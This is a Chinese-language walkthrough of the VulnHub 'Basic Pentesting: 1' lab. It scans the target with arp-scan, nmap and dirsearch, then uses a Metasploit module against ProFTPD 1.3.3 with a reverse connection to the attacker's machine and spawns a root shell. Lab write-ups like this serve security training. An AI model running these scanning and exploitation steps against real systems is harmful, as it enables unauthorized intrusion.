Basic Pentesting: 1

靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/#download

信息收集

扫描靶机的 ip 地址

arp-scan -l

kali:192.168.85.128

靶机:192.168.85.169

扫描靶机端口

nmap -p- -A 192.168.85.169

看到开放了 21,22,80 端口

先访问 80 端口

没看到什么有用的信息,开始扫描靶机的目录信息

dirsearch -u http://192.168.85.169

没扫到有用的信息

漏洞利用+提权

前面有一个 21 ftp 端口,版本为 proftpd 1.3.3

使用 msfconsole 找寻给版本的相关漏洞

search proftpd 1.3.3

看到 2 是符合版本的

use 2

show options

查看一下需要修改的参数

修改 rhosts 为靶机的 ip

设置反向连接

再用 show options 查看一下需要修改的参数

设置 lhosts 为攻击机的 ip(kali ip)

还有监听的端口(可以不改)

所有的都设置好后,运行

run

获取交互式 shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

发现是 root 用户

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值